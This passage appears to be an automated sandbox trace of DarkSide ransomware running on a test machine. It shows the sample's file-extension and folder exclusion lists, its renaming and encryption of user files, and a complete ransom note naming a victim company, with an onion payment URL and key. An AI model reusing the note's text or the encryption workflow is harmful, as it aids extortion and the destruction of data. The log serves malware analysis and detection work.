(_String="cab") returned 0x3 [0155.626] _wcsicmp (_Str1="cmd", _Str2="contact") returned -2 [0155.626] wcslen (_String="cmd") returned 0x3 [0155.626] _wcsicmp (_Str1="com", _Str2="contact") returned -1 [0155.626] wcslen (_String="com") returned 0x3 [0155.626] _wcsicmp (_Str1="cpl", _Str2="contact") returned 1 [0155.626] wcslen (_String="cpl") returned 0x3 [0155.626] _wcsicmp (_Str1="cur", _Str2="contact") returned 6 [0155.626] wcslen (_String="cur") returned 0x3 [0155.626] _wcsicmp (_Str1="deskthemepack", _Str2="contact") returned 1 [0155.626] wcslen (_String="deskthemepack") returned 0xd [0155.626] _wcsicmp (_Str1="diagcab", _Str2="contact") returned 1 [0155.626] wcslen (_String="diagcab") returned 0x7 [0155.626] _wcsicmp (_Str1="diagcfg", _Str2="contact") returned 1 [0155.626] wcslen (_String="diagcfg") returned 0x7 [0155.626] _wcsicmp (_Str1="diagpkg", _Str2="contact") returned 1 [0155.626] wcslen (_String="diagpkg") returned 0x7 [0155.626] _wcsicmp (_Str1="dll", _Str2="contact") returned 1 [0155.626] wcslen (_String="dll") returned 0x3 [0155.626] _wcsicmp (_Str1="drv", _Str2="contact") returned 1 [0155.626] wcslen (_String="drv") returned 0x3 [0155.626] _wcsicmp (_Str1="exe", _Str2="contact") returned 2 [0155.626] wcslen (_String="exe") returned 0x3 [0155.626] _wcsicmp (_Str1="hlp", _Str2="contact") returned 5 [0155.627] wcslen (_String="hlp") returned 0x3 [0155.627] _wcsicmp (_Str1="icl", _Str2="contact") returned 6 [0155.627] wcslen (_String="icl") returned 0x3 [0155.627] _wcsicmp (_Str1="icns", _Str2="contact") returned 6 [0155.627] wcslen (_String="icns") returned 0x4 [0155.627] _wcsicmp (_Str1="ico", _Str2="contact") returned 6 [0155.627] wcslen (_String="ico") returned 0x3 [0155.627] _wcsicmp (_Str1="ics", _Str2="contact") returned 6 [0155.627] wcslen (_String="ics") returned 0x3 [0155.627] _wcsicmp (_Str1="idx", _Str2="contact") returned 6 [0155.627] wcslen (_String="idx") returned 0x3 [0155.627] _wcsicmp (_Str1="ldf", _Str2="contact") returned 9 [0155.627] wcslen (_String="ldf") returned 0x3 [0155.627] _wcsicmp (_Str1="lnk", _Str2="contact") returned 9 [0155.627] wcslen (_String="lnk") returned 0x3 [0155.627] _wcsicmp (_Str1="mod", _Str2="contact") returned 10 [0155.627] wcslen (_String="mod") returned 0x3 [0155.627] _wcsicmp (_Str1="mpa", _Str2="contact") returned 10 [0155.627] wcslen (_String="mpa") returned 0x3 [0155.627] _wcsicmp (_Str1="msc", _Str2="contact") returned 10 [0155.627] wcslen (_String="msc") returned 0x3 [0155.627] _wcsicmp (_Str1="msp", _Str2="contact") returned 10 [0155.627] wcslen (_String="msp") returned 0x3 [0155.627] _wcsicmp (_Str1="msstyles", _Str2="contact") returned 10 [0155.627] wcslen (_String="msstyles") returned 0x8 [0155.627] _wcsicmp (_Str1="msu", _Str2="contact") returned 10 [0155.627] wcslen (_String="msu") returned 0x3 [0155.627] _wcsicmp (_Str1="nls", _Str2="contact") returned 11 [0155.627] wcslen (_String="nls") returned 0x3 [0155.627] _wcsicmp (_Str1="nomedia", _Str2="contact") returned 11 [0155.627] wcslen (_String="nomedia") returned 0x7 [0155.627] _wcsicmp (_Str1="ocx", _Str2="contact") returned 12 [0155.628] wcslen (_String="ocx") returned 0x3 [0155.628] _wcsicmp (_Str1="prf", _Str2="contact") returned 13 [0155.628] wcslen (_String="prf") returned 0x3 [0155.628] _wcsicmp (_Str1="ps1", _Str2="contact") returned 13 [0155.628] wcslen (_String="ps1") returned 0x3 [0155.628] _wcsicmp (_Str1="rom", _Str2="contact") returned 15 [0155.628] wcslen (_String="rom") returned 0x3 [0155.628] _wcsicmp (_Str1="rtp", _Str2="contact") returned 15 [0155.628] wcslen (_String="rtp") returned 0x3 [0155.628] _wcsicmp (_Str1="scr", _Str2="contact") returned 16 [0155.628] wcslen (_String="scr") returned 0x3 [0155.628] _wcsicmp (_Str1="shs", _Str2="contact") returned 16 [0155.628] wcslen (_String="shs") returned 0x3 [0155.628] _wcsicmp (_Str1="spl", _Str2="contact") returned 16 [0155.628] wcslen (_String="spl") returned 0x3 [0155.628] _wcsicmp (_Str1="sys", _Str2="contact") returned 16 [0155.628] wcslen (_String="sys") returned 0x3 [0155.628] _wcsicmp (_Str1="theme", _Str2="contact") returned 17 [0155.628] wcslen (_String="theme") returned 0x5 [0155.628] _wcsicmp (_Str1="themepack", _Str2="contact") returned 17 [0155.628] wcslen (_String="themepack") returned 0x9 [0155.628] _wcsicmp (_Str1="wpx", _Str2="contact") returned 20 [0155.628] wcslen (_String="wpx") returned 0x3 [0155.628] _wcsicmp (_Str1="lock", _Str2="contact") returned 9 [0155.628] wcslen (_String="lock") returned 0x4 [0155.628] _wcsicmp (_Str1="key", _Str2="contact") returned 8 [0155.628] wcslen (_String="key") returned 0x3 [0155.628] _wcsicmp (_Str1="hta", _Str2="contact") returned 5 [0155.628] wcslen (_String="hta") returned 0x3 [0155.628] _wcsicmp (_Str1="msi", _Str2="contact") returned 10 [0155.628] wcslen (_String="msi") returned 0x3 [0155.629] _wcsicmp (_Str1="pdb", _Str2="contact") returned 13 [0155.629] wcslen (_String="pdb") returned 0x3 [0155.629] _wcsicmp (_Str1="sqlite", _Str2="contact") returned 16 [0155.629] wcslen (_String="sqlite") returned 0x6 [0155.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0155.629] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0155.629] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0155.629] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 0x2a [0155.629] wcscpy (in: _Dest=0x321009e, _Source="sikvnb huvuib.contact" | out: _Dest="sikvnb huvuib.contact") returned="sikvnb huvuib.contact" [0155.629] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", dwFileAttributes=0x80) returned 1 [0155.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0155.629] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.629] ReadFile (in: hFile=0x1cc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.631] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x70c49e48 [0155.631] RtlComputeCrc32 (PartialCrc=0x9e48, Buffer=0x32ec24, Length=0x80) returned 0x5f69f719 [0155.631] RtlComputeCrc32 (PartialCrc=0xf719, Buffer=0x32ec24, Length=0x80) returned 0x892a169d [0155.631] RtlComputeCrc32 (PartialCrc=0x169d, Buffer=0x32ec24, Length=0x80) returned 0xe7becd25 [0155.631] RtlComputeCrc32 (PartialCrc=0xcd25, Buffer=0x32ec24, Length=0x80) returned 0x589c8652 [0155.631] CloseHandle (hObject=0x1cc) returned 1 [0155.632] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0155.632] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" [0155.632] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 0x40 [0155.632] wcscpy (in: _Dest=0x32200d0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.632] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.c06622a1"), dwFlags=0x8) returned 1 [0155.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1cc [0155.634] CreateIoCompletionPort (FileHandle=0x1cc, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0155.634] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0155.640] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5392d03c [0155.640] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5dde970d [0155.640] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3174e419 [0155.640] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f4e64b9 [0155.640] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3d47ed72 [0155.641] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x67238ddd [0155.641] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x70380d0e [0155.641] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7952e57f [0155.644] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0xc9375b7b [0155.644] RtlComputeCrc32 (PartialCrc=0x5b7b, Buffer=0x3480094, Length=0x80) returned 0xf6b577a [0155.644] RtlComputeCrc32 (PartialCrc=0x577a, Buffer=0x3480094, Length=0x80) returned 0xc3b0caf5 [0155.644] RtlComputeCrc32 (PartialCrc=0xcaf5, Buffer=0x3480094, Length=0x80) returned 0x4707ba33 [0155.644] RtlComputeCrc32 (PartialCrc=0xba33, Buffer=0x3480094, Length=0x80) returned 0x771f9604 [0155.644] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0155.644] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0155.644] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0155.644] FindNextFileW (in: hFindFile=0x132728, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0155.644] FindClose (in: hFindFile=0x132728 | out: hFindFile=0x132728) returned 1 [0155.645] _wcsicmp (_Str1="backup", _Str2="Contacts") returned -1 [0155.645] wcslen (_String="backup") returned 0x6 [0155.645] _wcsicmp (_Str1="bak", _Str2="Contacts") returned -1 [0155.645] wcslen (_String="bak") returned 0x3 [0155.645] _wcsicmp (_Str1="back", _Str2="Contacts") returned -1 [0155.645] wcslen (_String="back") returned 0x4 [0155.645] _wcsicmp (_Str1="archive", _Str2="Contacts") returned -2 [0155.645] wcslen (_String="archive") returned 0x7 [0155.645] _wcsicmp (_Str1="bckp", _Str2="Contacts") returned -1 [0155.645] wcslen (_String="bckp") returned 0x4 [0155.645] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0155.645] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.645] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0155.645] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x51b277e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x51b277e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0155.645] _wcsicmp (_Str1="$recycle.bin", _Str2="Desktop") returned -64 [0155.645] wcslen (_String="$recycle.bin") returned 0xc [0155.646] _wcsicmp (_Str1="config.msi", _Str2="Desktop") returned -1 [0155.646] wcslen (_String="config.msi") returned 0xa [0155.646] _wcsicmp (_Str1="$windows.~bt", _Str2="Desktop") returned -64 [0155.646] wcslen (_String="$windows.~bt") returned 0xc [0155.646] _wcsicmp (_Str1="$windows.~ws", _Str2="Desktop") returned -64 [0155.646] wcslen (_String="$windows.~ws") returned 0xc [0155.646] _wcsicmp (_Str1="windows", _Str2="Desktop") returned 19 [0155.646] wcslen (_String="windows") returned 0x7 [0155.646] _wcsicmp (_Str1="appdata", _Str2="Desktop") returned -3 [0155.646] wcslen (_String="appdata") returned 0x7 [0155.646] _wcsicmp (_Str1="application data", _Str2="Desktop") returned -3 [0155.646] wcslen (_String="application data") returned 0x10 [0155.646] _wcsicmp (_Str1="boot", _Str2="Desktop") returned -2 [0155.646] wcslen (_String="boot") returned 0x4 [0155.646] _wcsicmp (_Str1="google", _Str2="Desktop") returned 3 [0155.646] wcslen (_String="google") returned 0x6 [0155.646] _wcsicmp (_Str1="mozilla", _Str2="Desktop") returned 9 [0155.646] wcslen (_String="mozilla") returned 0x7 [0155.646] _wcsicmp (_Str1="program files", _Str2="Desktop") returned 12 [0155.646] wcslen (_String="program files") returned 0xd [0155.646] _wcsicmp (_Str1="program files (x86)", _Str2="Desktop") returned 12 [0155.646] wcslen (_String="program files (x86)") returned 0x13 [0155.646] _wcsicmp (_Str1="programdata", _Str2="Desktop") returned 12 [0155.646] wcslen (_String="programdata") returned 0xb [0155.646] _wcsicmp (_Str1="system volume information", _Str2="Desktop") returned 15 [0155.646] wcslen (_String="system volume information") returned 0x19 [0155.646] _wcsicmp (_Str1="tor browser", _Str2="Desktop") returned 16 [0155.646] wcslen (_String="tor browser") returned 0xb [0155.646] _wcsicmp (_Str1="windows.old", _Str2="Desktop") returned 19 [0155.646] wcslen (_String="windows.old") returned 0xb [0155.646] _wcsicmp (_Str1="intel", _Str2="Desktop") returned 5 [0155.646] wcslen (_String="intel") returned 0x5 [0155.646] _wcsicmp (_Str1="msocache", _Str2="Desktop") returned 9 [0155.646] wcslen (_String="msocache") returned 0x8 [0155.646] _wcsicmp (_Str1="perflogs", _Str2="Desktop") returned 12 [0155.646] wcslen (_String="perflogs") returned 0x8 [0155.647] _wcsicmp (_Str1="x64dbg", _Str2="Desktop") returned 20 [0155.647] wcslen (_String="x64dbg") returned 0x6 [0155.647] _wcsicmp (_Str1="public", _Str2="Desktop") returned 12 [0155.647] wcslen (_String="public") returned 0x6 [0155.647] _wcsicmp (_Str1="all users", _Str2="Desktop") returned -3 [0155.647] wcslen (_String="all users") returned 0x9 [0155.647] _wcsicmp (_Str1="default", _Str2="Desktop") returned -13 [0155.647] wcslen (_String="default") returned 0x7 [0155.647] wcscpy (in: _Dest=0x1d1000, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0155.647] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0155.647] wcscpy (in: _Dest=0x1d1044, _Source="Desktop" | out: _Dest="Desktop") returned="Desktop" [0155.647] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0155.647] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0155.649] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.649] GetNamedSecurityInfoW () returned 0x0 [0155.649] SetEntriesInAclW () returned 0x0 [0155.649] SetNamedSecurityInfoW () returned 0x0 [0155.677] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1327c8) returned 1 [0155.678] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32eb6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0155.678] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0155.678] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0155.678] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0155.678] WriteFile (in: hFile=0x1c, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32eb3c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32eb3c*=0x7ca, lpOverlapped=0x0) returned 1 [0155.679] CloseHandle (hObject=0x1c) returned 1 [0155.679] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0155.679] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.679] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="" [0155.680] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 0x2a [0155.680] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", fInfoLevelId=0x0, lpFindFileData=0x32ed9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed9c) returned 0x1327c8 [0155.680] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8a7cdc00, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8a7cdc00, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.680] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb56c6a60, ftCreationTime.dwHighDateTime=0x1d5e560, ftLastAccessTime.dwLowDateTime=0x3abde0d0, ftLastAccessTime.dwHighDateTime=0x1d5e332, ftLastWriteTime.dwLowDateTime=0x3abde0d0, ftLastWriteTime.dwHighDateTime=0x1d5e332, nFileSizeHigh=0x0, nFileSizeLow=0x1b29, dwReserved0=0x0, dwReserved1=0x0, cFileName="-uY5xVhL.m4a", cAlternateFileName="")) returned 1 [0155.680] _wcsicmp (_Str1="-uY5xVhL.m4a", _Str2="README.c06622a1.TXT") returned -69 [0155.680] wcsstr (_Str="-uY5xVhL.m4a", _SubStr="README") returned 0x0 [0155.680] _wcsicmp (_Str1="autorun.inf", _Str2="-uY5xVhL.m4a") returned 52 [0155.680] wcslen (_String="autorun.inf") returned 0xb [0155.680] _wcsicmp (_Str1="boot.ini", _Str2="-uY5xVhL.m4a") returned 53 [0155.680] wcslen (_String="boot.ini") returned 0x8 [0155.680] _wcsicmp (_Str1="bootfont.bin", _Str2="-uY5xVhL.m4a") returned 53 [0155.680] wcslen (_String="bootfont.bin") returned 0xc [0155.680] _wcsicmp (_Str1="bootsect.bak", _Str2="-uY5xVhL.m4a") returned 53 [0155.680] wcslen (_String="bootsect.bak") returned 0xc [0155.680] _wcsicmp (_Str1="desktop.ini", _Str2="-uY5xVhL.m4a") returned 55 [0155.680] wcslen (_String="desktop.ini") returned 0xb [0155.680] _wcsicmp (_Str1="iconcache.db", _Str2="-uY5xVhL.m4a") returned 60 [0155.680] wcslen (_String="iconcache.db") returned 0xc [0155.680] _wcsicmp (_Str1="ntldr", _Str2="-uY5xVhL.m4a") returned 65 [0155.680] wcslen (_String="ntldr") returned 0x5 [0155.680] _wcsicmp (_Str1="ntuser.dat", _Str2="-uY5xVhL.m4a") returned 65 [0155.680] wcslen (_String="ntuser.dat") returned 0xa [0155.680] _wcsicmp (_Str1="ntuser.dat.log", _Str2="-uY5xVhL.m4a") returned 65 [0155.680] wcslen (_String="ntuser.dat.log") returned 0xe [0155.680] _wcsicmp (_Str1="ntuser.ini", _Str2="-uY5xVhL.m4a") returned 65 [0155.680] wcslen (_String="ntuser.ini") returned 0xa [0155.680] _wcsicmp (_Str1="thumbs.db", _Str2="-uY5xVhL.m4a") returned 71 [0155.680] wcslen (_String="thumbs.db") returned 0x9 [0155.718] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0155.718] wcslen (_String="386") returned 0x3 [0155.718] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0155.718] wcslen (_String="adv") returned 0x3 [0155.718] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0155.718] wcslen (_String="ani") returned 0x3 [0155.718] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0155.718] wcslen (_String="bat") returned 0x3 [0155.718] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0155.718] wcslen (_String="bin") returned 0x3 [0155.718] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0155.718] wcslen (_String="cab") returned 0x3 [0155.718] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0155.719] wcslen (_String="cmd") returned 0x3 [0155.719] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0155.719] wcslen (_String="com") returned 0x3 [0155.719] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0155.719] wcslen (_String="cpl") returned 0x3 [0155.719] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0155.719] wcslen (_String="cur") returned 0x3 [0155.719] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0155.719] wcslen (_String="deskthemepack") returned 0xd [0155.719] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0155.719] wcslen (_String="diagcab") returned 0x7 [0155.719] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0155.719] wcslen (_String="diagcfg") returned 0x7 [0155.719] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0155.719] wcslen (_String="diagpkg") returned 0x7 [0155.719] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0155.719] wcslen (_String="dll") returned 0x3 [0155.719] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0155.720] wcslen (_String="drv") returned 0x3 [0155.720] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0155.720] wcslen (_String="exe") returned 0x3 [0155.720] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0155.720] wcslen (_String="hlp") returned 0x3 [0155.720] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0155.720] wcslen (_String="icl") returned 0x3 [0155.720] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0155.720] wcslen (_String="icns") returned 0x4 [0155.720] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0155.720] wcslen (_String="ico") returned 0x3 [0155.720] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0155.720] wcslen (_String="ics") returned 0x3 [0155.720] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0155.721] wcslen (_String="idx") returned 0x3 [0155.721] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0155.721] wcslen (_String="ldf") returned 0x3 [0155.721] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0155.721] wcslen (_String="lnk") returned 0x3 [0155.721] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0155.721] wcslen (_String="mod") returned 0x3 [0155.721] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0155.721] wcslen (_String="mpa") returned 0x3 [0155.721] _wcsicmp 